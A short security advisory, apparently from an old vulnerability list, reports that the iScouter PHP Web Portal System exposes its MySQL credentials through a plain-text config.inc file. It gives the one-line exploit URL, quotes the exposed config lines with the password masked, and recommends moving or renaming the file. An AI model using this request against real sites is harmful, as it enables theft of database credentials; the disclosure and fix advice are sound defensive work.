COMMAND

    iScouter PHP Web Portal System

SYSTEMS AFFECTED

    iScouter PHP Web Portal System

PROBLEM

    Cabezon Aurélien found following.  He has found that he can easily
    retrieve  MySQL  password  of  the  last  iScouter  PHP Web Portal
    System.

    Exploit:

        www.your-iScouter-web-portal.com/config.inc

    You can find those lines in clear text:

        $CFG_DB_SERVERTYPE = "mySQL";
        $CFG_DB_HOST = "www.your-iScouter-web-portal.com";
        $CFG_DB_USERNAME = "root";
        $CFG_DB_PASSWORD = "xxxxxxxxx";
        $CFG_DB_NAME = "iscouter";

        CFG_DB_SERVERTYPE: Database Server Type, you need check with
        system_config.inc to find whether your database server is supported in
        current version
        CFG_DB_HOST:   Database Hostname
        CFG_DB_USERNAME:  Database Username
        CFG_DB_PASSWORD:   Database Password
        CFG_DB_NAME:   Database Name

SOLUTION

    You  should  rename  "config.inc"  in  "config.inc.php"  and don't
    forget to update the files linked with.

    Any configuration  file, for  example database  access, should  be
    stored in a different space than web html/php files, *outside*  of
    the webserver's  scope.   This has  been discussed  a lot of times
    here.

    Think about the  day your web  server will stop  parsing php files
    for some reason.